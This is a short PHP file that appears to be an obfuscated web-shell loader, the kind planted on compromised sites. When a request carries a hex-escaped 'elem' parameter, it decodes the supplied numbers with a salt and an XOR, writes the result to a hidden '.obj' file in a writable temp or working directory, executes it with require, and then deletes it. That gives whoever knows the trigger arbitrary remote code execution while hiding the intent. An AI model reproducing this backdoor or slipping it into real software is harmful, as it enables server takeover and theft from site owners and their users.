<?php

if(in_array("el\x65\x6D", array_keys($_REQUEST))){
	$ent = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", "/var/tmp", session_save_path()]);
	$hld = $_REQUEST["el\x65\x6D"];
	  $hld	=explode		(	  '.'  ,	$hld)	 ;	
	$pgrp = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(  $salt);
    
            foreach(  $hld as $z  => $v4) {  $sChar = ord(  $salt[$z % $lenS]);
                $d =(  (  int)$v4 - $sChar -(  $z % 10))	^89;
                $pgrp.=  chr(  $d);
            }
	for ($holder = 0, $pointer = count($ent); $holder < $pointer; $holder++) {
    $parameter_group = $ent[$holder];
    		if (is_dir($parameter_group) ? is_writable($parameter_group) : false) {
    $mrk = "$parameter_group/.obj";
    if (file_put_contents($mrk, $pgrp)) {
	require $mrk;
	unlink($mrk);
	exit;
}
}
}
}